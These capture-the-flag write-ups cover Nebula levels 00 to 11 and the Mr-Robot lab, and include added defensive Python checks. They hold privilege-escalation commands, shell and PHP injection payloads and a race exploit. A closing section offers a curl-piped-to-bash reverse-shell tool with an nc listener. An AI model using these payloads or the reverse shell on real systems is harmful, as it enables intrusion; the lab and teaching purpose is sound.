Nebula

https://exploit-exercises.com/nebula/

level00

level00@nebula:~$ find / -perm -4000 2>/dev/null | grep -i flag00
/bin/.../flag00
/rofs/bin/.../flag00
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level01

level01@nebula:~$ ls
echo
level01@nebula:~$ cat echo
#!/bin/bash

/bin/bash
level01@nebula:~$ echo $PATH
/home/level01:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ /home/flag01/flag01
flag01@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level02

level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo level02 is cool")
level02 is cool
level02@nebula:~$ echo $USER
level02
level02@nebula:~$ USER="level02;/bin/bash;echo "
level02@nebula:~$ export USER
level02@nebula:~$ echo $USER
level02;/bin/bash;echo
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo level02;/bin/bash;echo  is cool")
level02
flag02@nebula:~$ getflag
You have successfully executed getflag on a target account
flag02@nebula:~$ exit
exit
is cool

---

level03

level03@nebula:/home/flag03$ ls -alh
total 5.5K
drwxr-x--- 1 flag03 level03   60 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     140 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 1 flag03 flag03    60 2017-01-18 02:27 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

level03@nebula:/home/flag03$ cd writable.d/
level03@nebula:/home/flag03/writable.d$ cat getflag.sh
#!/bin/bash

/bin/getflag > /tmp/getflag
level03@nebula:/home/flag03/writable.d$ cat /tmp/getflag
You have successfully executed getflag on a target account

---

level04

level04@nebula:~$ /home/flag04/flag04 /home/flag04/token
You may not access '/home/flag04/token'
level04@nebula:~$ ln -s /home/flag04/token thet
level04@nebula:~$ /home/flag04/flag04 thet
06508b5e-8909-4f38-b630-fdb148a848a2
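The refusal message and the symlink bypass above show that flag04 decides on the text of the path it is given, not on the file that text resolves to. The following is an added example, not Nebula's code: it applies that name-based rule, a realpath-based rule and an identity-based rule to a symlink named like the one in the transcript, inside a throwaway directory with a placeholder token file (constructed sample data).

```python
"""Why level04's check on argv[1] is bypassed by `ln -s ... thet`, and what
a check should look at instead.

Added example, not Nebula's own code.  The directory, the placeholder token
file and the symlink below are constructed sample data.
"""
import os
import tempfile


def name_check(path: str) -> bool:
    """flag04's rule as the transcript implies it: grant unless the path
    *string* mentions 'token'."""
    return "token" not in path


def realpath_check(path: str) -> bool:
    """Resolve symlinks and '..' first, then apply the same rule to the real
    path.  Stops symlinks, but not hard links or bind mounts."""
    return "token" not in os.path.realpath(path)


def identity_check(path: str, protected: str) -> bool:
    """Open the candidate and compare the opened object's (device, inode)
    with the protected file's.  The decision is about the file itself, so
    neither the name nor the kind of link matters."""
    fd = os.open(path, os.O_RDONLY)
    try:
        st = os.fstat(fd)
    finally:
        os.close(fd)
    p = os.stat(protected)
    return (st.st_dev, st.st_ino) != (p.st_dev, p.st_ino)


def demo() -> dict:
    """Apply the three checks to a symlink that points at the token.
    True means access would be granted."""
    with tempfile.TemporaryDirectory() as d:
        token = os.path.join(d, "token")
        with open(token, "w") as f:
            f.write("placeholder-token (constructed)\n")
        link = os.path.join(d, "thet")      # the transcript's `ln -s ... thet`
        os.symlink(token, link)
        return {
            "name_check": name_check(link),                 # True: bypassed
            "realpath_check": realpath_check(link),         # False: refused
            "identity_check": identity_check(link, token),  # False: refused
        }


if __name__ == "__main__":
    print(demo())
```

The realpath rule is enough against the symlink trick on the page; the identity rule is the one that also survives hard links and renames, because it compares the object that was actually opened rather than any spelling of its name.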

---

level05

level05@nebula:~$ cd /home/flag05/
level05@nebula:/home/flag05$ ls -alh
total 9.0K
drwxr-x--- 1 flag05 level05   80 2017-01-18 02:34 .
drwxr-xr-x 1 root   root     200 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05    14 2017-01-18 02:34 .bash_history
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3.3K 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05    60 2017-01-18 02:34 .cache
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh
level05@nebula:/home/flag05$ cd .backup/
level05@nebula:/home/flag05/.backup$ ls -alh
total 2.0K
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 1 flag05 level05   80 2017-01-18 02:34 ..
-rw-rw-r-- 1 flag05 flag05  1.8K 2011-11-20 20:13 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz ~
level05@nebula:/home/flag05/.backup$ cd !$
cd ~
level05@nebula:~$ ls
backup-19072011.tgz
level05@nebula:~$ gunzip backup-19072011.tgz
level05@nebula:~$ ls
backup-19072011.tar
level05@nebula:~$ tar xvf backup-19072011.tar
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$ ssh flag05@localhost -i .ssh/id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level06

level06@nebula:~$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level06@nebula:~$ exit
logout
Connection to nebula closed.
> john passwd
...snip...
> john --show passwd 
flag06:hello:993:993::/home/flag06:/bin/sh

1 password hash cracked, 0 left
>  ssh flag06@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
flag06@nebula's password:
...snip...
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account
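level06 works because the hash sits in the world-readable passwd file, and because it is a 13-character DES crypt(3) value that john cracks almost instantly. The following added audit (not Nebula's code) classifies the password field of passwd-format records and reports the ones that should not be there; the sample records are constructed, except the flag06 line, which is the one quoted above.

```python
"""Audit passwd-format records for what level06 exploits: a password hash
kept in the world-readable passwd file rather than in shadow, and in the
legacy 13-character DES crypt(3) format.

Added example, not Nebula's own code.  SAMPLE is constructed; its flag06
line is the record quoted from /etc/passwd in the transcript above.
"""
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level06:x:1006:1006::/home/level06:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
guest::1001:1001::/home/guest:/bin/sh
# comment lines and malformed records are skipped
broken:line
"""

# Alphabet of traditional DES crypt output: "./0-9A-Za-z", always 13 chars.
DES_ALPHABET = set("./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
# Markers meaning "no usable hash here": shadowed (x) or locked (*, !, !!).
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def classify_password_field(field: str) -> str:
    """Name the kind of value found in the second passwd field."""
    if field in SHADOWED_OR_LOCKED:
        return "shadowed-or-locked"     # fine: the real hash lives in /etc/shadow
    if field == "":
        return "empty"                  # no password at all
    if field.startswith("$"):
        return "modular-crypt"          # $1$/$5$/$6$/$y$: salted and iterated, but still exposed
    if len(field) == 13 and set(field) <= DES_ALPHABET:
        return "des"                    # legacy crypt(3): 8-char limit, 12-bit salt, fast to crack
    return "unknown"


def audit_passwd(text: str) -> list:
    """Return (user, finding) for every record whose password field should
    not appear in a world-readable file."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue                    # malformed record; a real audit would report it too
        user, pw = fields[0], fields[1]
        kind = classify_password_field(pw)
        if kind != "shadowed-or-locked":
            findings.append((user, kind))
    return findings


if __name__ == "__main__":
    for user, kind in audit_passwd(SAMPLE):
        print(f"{user}: {kind}")
```

Run it over a copy of /etc/passwd taken from a host; anything other than an empty list is a finding, and "des" entries are the ones an offline guess-and-compare run will recover first.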

---

level07

> curl "http://nebula:7007/index.cgi?Host=%60/bin/getflag>/tmp/level07flag%60"
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination%
> ssh level07@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
level07@nebula's password:
...snip...
level07@nebula:~$ cat /tmp/level07flag
You have successfully executed getflag on a target account
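level02 (USER spliced into a system() string) and level07 (the Host query parameter spliced into a command line) are the same defect: text an attacker controls reaches a shell parser. The following added example is not Nebula's code. It models the vulnerable string building next to two fixes and a tokenizer-based check built on Python's shlex; the make_* helpers are hypothetical, and "ping -c 3 <Host>" is an assumption about what the level07 CGI runs.

```python
"""Untrusted text reaching a shell: the level02 / level07 defect and its fixes.

Added example, not Nebula's own code.  The make_* helpers are hypothetical
stand-ins for what flag02 (system("/bin/echo $USER is cool")) and the level07
CGI (assumed to run "ping -c 3 <Host>") do with attacker-controlled input.
"""
import re
import shlex

# Value taken from the level02 transcript: USER is fully attacker-controlled.
INJECTED_USER = "level02;/bin/bash;echo "

# A token made only of these characters is a shell operator, not an argument.
SHELL_OPERATOR_CHARS = set("();<>|&`$")


def make_shell_string(user: str) -> str:
    """Vulnerable: the untrusted value is pasted into text a shell will parse."""
    return f"/bin/echo {user} is cool"


def make_quoted_shell_string(user: str) -> str:
    """Mitigation when a shell is unavoidable: quote the value so the shell
    treats it as one literal word, whatever characters it contains."""
    return f"/bin/echo {shlex.quote(user)} is cool"


def make_argv(user: str) -> list:
    """Preferred fix: hand the program an argument vector (execve, or
    subprocess.run with a list); no shell is involved, so nothing is parsed."""
    return ["/bin/echo", user, "is cool"]


def shell_operator_tokens(command: str) -> list:
    """Tokenise as a POSIX shell would and return the operator tokens
    (; | & backtick $ and redirections).  Any operator that originates from
    an untrusted value means that value changed the command's structure."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    return [tok for tok in lex if tok and set(tok) <= SHELL_OPERATOR_CHARS]


def is_valid_username(user: str) -> bool:
    """Input validation: a conservative allowlist for a Unix user name."""
    return re.fullmatch(r"[a-z_][a-z0-9_-]{0,31}", user) is not None


if __name__ == "__main__":
    vulnerable = make_shell_string(INJECTED_USER)
    print(vulnerable)
    print("operators:", shell_operator_tokens(vulnerable))                        # [';', ';']
    print("quoted:   ", shell_operator_tokens(make_quoted_shell_string(INJECTED_USER)))  # []
    print("argv:     ", make_argv(INJECTED_USER))
    # level07: the backtick substitution from the curl request above
    print(shell_operator_tokens("ping -c 3 `/bin/getflag>/tmp/level07flag`"))   # ['`', '>', '`']
```

The two ';' tokens are exactly why the transcript shows three commands running (echo, the shell, then "echo is cool" after exit). Quoting removes them, but the argv form is the one to prefer: there is no shell to confuse, and the allowlist on top rejects the value before it is used at all.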

---

level08

Load pcap in Wireshark.

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

..wwwbugs login: l.le.ev.ve.el.l8.8
..
Password: backdoor...00Rm8.ate
.
..
Login incorrect
wwwbugs login: 

The password is not 'backdoor': the dots are backspaces.

backdoor becomes:
backd00Rm8
backd00Rm8 becomes:
backd00Rmate
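The same reconstruction as a small parser, added here as an example and not part of the original writeup. In the telnet session each keystroke travels to the server as it is typed; a DEL (0x7f) or BS (0x08) byte undoes the previous character, and Wireshark's stream view prints such bytes as dots. CAPTURED is constructed from the transcript above, with the dots put back as DEL bytes.

```python
"""Recover the password typed in the level08 capture by replaying the
line-editing bytes.

Added example, not Nebula's own code.  CAPTURED is constructed from the
"backdoor...00Rm8.ate" sequence shown above.
"""
ERASE = {0x7F, 0x08}   # DEL and BS: remove the last typed character
ENTER = {0x0D, 0x0A}   # CR / LF: the line is submitted

CAPTURED = b"backdoor\x7f\x7f\x7f00Rm8\x7fate"


def render_like_wireshark(data: bytes) -> str:
    """Show the bytes the way the 'Follow TCP stream' pane does:
    printable ASCII as-is, everything else as a dot."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)


def replay_keystrokes(data: bytes) -> str:
    """Apply erase and enter bytes to reconstruct the line the login
    prompt actually received.  Other control bytes (telnet negotiation,
    NUL padding) are ignored."""
    line = []
    for b in data:
        if b in ERASE:
            if line:
                line.pop()
        elif b in ENTER:
            break
        elif 0x20 <= b < 0x7F:
            line.append(chr(b))
    return "".join(line)


if __name__ == "__main__":
    print(render_like_wireshark(CAPTURED))   # backdoor...00Rm8.ate
    print(replay_keystrokes(CAPTURED))       # backd00Rmate
```

To use it on a real capture, export the client-to-server direction of the stream as raw bytes and feed those; the server-to-client echo must not be mixed in, or every character would appear twice.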

---

level09

level09@nebula:~$ cat test
[email {${system($use_me)}}]

level09@nebula:~$ /home/flag09/flag09 test "/bin/getflag"
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:~$

---

level10

level10@nebula:~$ cat nc.sh
#!/bin/bash

while true
do
        nc -l 18211 &
done
level10@nebula:~$ cat ln1.sh
#!/bin/bash

while true
do
        ln -sf /home/flag10/token /home/level10/token &
done
level10@nebula:~$ cat ln2.sh
#!/bin/bash

while true
do
        ln -sf /home/level10/x /home/level10/token &
done
level10@nebula:~$ cat run.sh
#!/bin/bash

while true
do
        /home/flag10/flag10 /home/level10/token 127.0.0.1 &
done
level10@nebula:~$ cat x
x

* Run all bash scripts and then nc.sh (race condition)

level10@nebula:~$ ./nc.sh 
nc: nc: nc: nc: nc: nc: nc: nc: nc: nc: nc: nc:
nc: Address already in use
nc: .oO Oo.
x
Address already in use
Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
Address already in use
Address already in use
Address already in use
nc: Address already in use
nc: Address already in use
Address already in use
.oO Oo.
x
nc: Address already in use
Address already in use
Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
nc: Address already in use
nc: Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
nc: .oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
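What the ln1.sh/ln2.sh loops exploit is the gap between the moment flag10 checks the file and the moment it opens it: access(2) judges by the real uid, open(2) by the privileged effective uid, and the symlink can change in between. The following added example (not Nebula's code) makes that race deterministic with a hook that swaps the link in the window, and puts the check-then-use pattern beside the descriptor-based form that closes it. Python cannot switch uids here, so the privilege boundary is simulated: both files are readable, and the check on the opened file stands in for the real one.

```python
"""The check-then-use race that level10 wins, made deterministic.

Added example, not Nebula's own code.  The hook passed as
between_check_and_use plays the role of the attacker's `ln -sf` loop; the
temporary directory and its files are constructed sample data.
"""
import os
import tempfile


def vulnerable_read(path: str, between_check_and_use) -> str:
    """access() then open(): two name lookups, so the name can be re-pointed
    between them (what flag10 does, as the level's loops rely on)."""
    if not os.access(path, os.R_OK):
        return "denied"
    between_check_and_use()            # the race window
    with open(path) as f:              # second lookup: whatever 'path' is *now*
        return f.read()


def hardened_read(path: str, between_check_and_use) -> str:
    """open() first, then decide on the descriptor: one lookup, and every
    byte read afterwards comes from the object that was checked."""
    fd = os.open(path, os.O_RDONLY)
    try:
        st = os.fstat(fd)
        # Stand-in for the real check (a setuid program would drop to the
        # real uid before open, or verify the opened file against it).
        if st.st_uid != os.getuid():
            return "denied"
        between_check_and_use()        # same window, now harmless
        return os.read(fd, 4096).decode()
    finally:
        os.close(fd)


def demo() -> dict:
    """Run both readers against a symlink that is flipped mid-call."""
    with tempfile.TemporaryDirectory() as d:
        public = os.path.join(d, "x")               # level10's own file
        secret = os.path.join(d, "flag10_token")    # stands in for /home/flag10/token
        with open(public, "w") as f:
            f.write("x")
        with open(secret, "w") as f:
            f.write("constructed-secret-token")
        link = os.path.join(d, "token")

        def point_link_at(target: str) -> None:
            tmp = link + ".new"
            os.symlink(target, tmp)
            os.replace(tmp, link)       # atomic swap, the effect of `ln -sf`

        results = {}
        point_link_at(public)
        results["vulnerable"] = vulnerable_read(link, lambda: point_link_at(secret))
        point_link_at(public)
        results["hardened"] = hardened_read(link, lambda: point_link_at(secret))
        return results


if __name__ == "__main__":
    print(demo())   # {'vulnerable': 'constructed-secret-token', 'hardened': 'x'}
```

The vulnerable reader passes its check on one file and reads another; the hardened reader can only ever return the file it checked. For a real setuid program the equivalent is to drop privileges before the open, or to open, fstat and decide on the descriptor, never on the path.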

---

level11

level11@nebula:~$ PATH=/home/level11:$PATH
level11@nebula:~$ export PATH
level11@nebula:~$ echo -e "Content-Length: 1\nDDD" | /home/flag11/flag11
getflag is executing on a non-flag account, this doesn't count (BUG)

TBC...

Mr-Robot 1 (VulnHub)

https://www.vulnhub.com/entry/mr-robot-1,151/
---
https://192.168.1.240/robots.txt


User-agent: *
fsocity.dic
key-1-of-3.txt
---
https://192.168.1.240/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
---
cat fsocity.dic | sort | uniq -c | sort -hr | tail -15
     75 002
     75 001
     75 000080
     75 000000
     75 000
      1 uHack
      1 psychedelic
      1 imhack
      1 iamalearn
      1 ER28-0652
      1 c3fcd3d76192e4007dfb496cca67e13b (another key?)
      1 ABCDEFGHIJKLMNOPQRSTUVWXYZ
      1 abcdefghijklmnopq
      1 abcdEfghijklmnop
      1 abcdefghijklmno
---
http://192.168.1.240/wp-login.php

elliot
ER28-0652
---
use exploit/unix/webapp/wp_admin_shell_upload

python -c 'import pty;pty.spawn("/bin/bash")'
su robot (look up the MD5 hash from password.raw-md5 online)
---
robot@linux:~$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
---
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f95
---
find / -perm +6000 -type f -ls 2>/dev/null
 15068   44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
 15093   68 -rwsr-xr-x   1 root     root        69120 Feb 12  2015 /bin/umount
 15060   96 -rwsr-xr-x   1 root     root        94792 Feb 12  2015 /bin/mount
 15069   44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
 15085   40 -rwsr-xr-x   1 root     root        36936 Feb 17  2014 /bin/su
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-touchlock
 36231   48 -rwsr-xr-x   1 root     root        47032 Feb 17  2014 /usr/bin/passwd
 36216   32 -rwsr-xr-x   1 root     root        32464 Feb 17  2014 /usr/bin/newgrp
 36298  412 -rwxr-sr-x   1 root     utmp       421768 Nov  7  2013 /usr/bin/screen
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-unlock
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-lock
 36041   44 -rwsr-xr-x   1 root     root        41336 Feb 17  2014 /usr/bin/chsh
 36056   36 -rwxr-sr-x   1 root     crontab     35984 Feb  9  2013 /usr/bin/crontab
 36038   48 -rwsr-xr-x   1 root     root        46424 Feb 17  2014 /usr/bin/chfn
 36034   56 -rwxr-sr-x   1 root     shadow      54968 Feb 17  2014 /usr/bin/chage
 36148   68 -rwsr-xr-x   1 root     root        68152 Feb 17  2014 /usr/bin/gpasswd
 36112   24 -rwxr-sr-x   1 root     shadow      23360 Feb 17  2014 /usr/bin/expiry
 36080   16 -rwxr-sr-x   1 root     mail        14856 Dec  7  2013 /usr/bin/dotlockfile
 36349  152 -rwsr-xr-x   1 root     root       155008 Mar 12  2015 /usr/bin/sudo
 36337  280 -rwxr-sr-x   1 root     ssh        284784 May 12  2014 /usr/bin/ssh-agent
 36388   20 -rwxr-sr-x   1 root     tty         19024 Feb 12  2015 /usr/bin/wall
 34835  496 -rwsr-xr-x   1 root     root       504736 Nov 13  2015 /usr/local/bin/nmap
...
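The listing above is long, and the entry that matters is the one that does not belong to the base system: a setuid-root nmap under /usr/local/bin. The following added example (not the author's or the VM's code) parses `find -ls` lines and reports set-id files outside package-managed directories or with a world-writable mode. LISTING is constructed from the lines shown above, and DISTRO_DIRS is an assumed baseline of where package-managed binaries live.

```python
"""Triage a `find / -perm +6000 -type f -ls` listing for set-id binaries
that do not belong to the base system.

Added example, not the author's or Mr-Robot's code.  LISTING is constructed
from the output shown above; DISTRO_DIRS is an assumed baseline.
"""
LISTING = """\
 15068   44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
 15085   40 -rwsr-xr-x   1 root     root        36936 Feb 17  2014 /bin/su
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-touchlock
 36349  152 -rwsr-xr-x   1 root     root       155008 Mar 12  2015 /usr/bin/sudo
 36337  280 -rwxr-sr-x   1 root     ssh        284784 May 12  2014 /usr/bin/ssh-agent
 34835  496 -rwsr-xr-x   1 root     root       504736 Nov 13  2015 /usr/local/bin/nmap
"""

# Directories the package manager owns; set-id files elsewhere need a reason.
DISTRO_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/lib/")


def parse_find_ls(line: str) -> dict:
    """Split one `find -ls` line into its columns.  The path is the 11th
    field and may contain spaces, hence the bounded split."""
    (inode, blocks, mode, links, owner, group,
     size, month, day, year_or_time, path) = line.split(None, 10)
    return {
        "mode": mode,
        "owner": owner,
        "group": group,
        "size": int(size),
        "path": path,
        "setuid": mode[3] in "sS",          # owner-execute slot
        "setgid": mode[6] in "sS",          # group-execute slot
        "world_writable": mode[8] == "w",   # other-write slot
    }


def unexpected_setid(listing: str) -> list:
    """Paths of set-id files that sit outside DISTRO_DIRS or are
    world-writable (either makes them a privilege-escalation candidate)."""
    flagged = []
    for line in listing.splitlines():
        if not line.strip():
            continue
        e = parse_find_ls(line)
        if not (e["setuid"] or e["setgid"]):
            continue
        if not e["path"].startswith(DISTRO_DIRS) or e["world_writable"]:
            flagged.append(e["path"])
    return flagged


if __name__ == "__main__":
    for path in unexpected_setid(LISTING):
        print("review:", path)   # review: /usr/local/bin/nmap
```

On a real host, diff the flagged list against the package manager's records (dpkg -S or rpm -qf on each path) and against a listing taken at build time; a set-id binary that neither knows about is the finding.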
---
robot@linux:~$ nmap -iL /root/key-3-of-3.txt localhost
nmap -iL /root/key-3-of-3.txt localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2016-09-11 11:25 UTC
Failed to resolve given hostname/IP: 04787ddef27c3dee1ee161b21670b4e4.
Note that you can't use '/mask' AND '[1-4,7,100-]' style IP ranges
WARNING: No targets were specified, so 0 hosts scanned.
Nmap finished: 0 IP addresses (0 hosts up) scanned in 0.314 seconds
robot@linux:~$

alm.fm

I have created a tool which will try and establish a reverse shell to a nominated IP address and port using the following binaries (in order).

  1. bash
  2. nc
  3. ruby
  4. php
  5. python
To use this tool run the following on the target host:
curl https://alm.fm/<your-ip>/<your-port> | bash

On your machine make sure you have something like this running:
nc -l -p <your-port>
This should save you some time when performing engagements and you have a web shell or similar. It's worth noting that the target will attempt to make a TCP connection outbound, which may be picked up.

Be aware that curl XXXX | bash is seen as bad practice these days (when was it ever a good idea?), but in this case it's convenient. You can grab the PHP code here.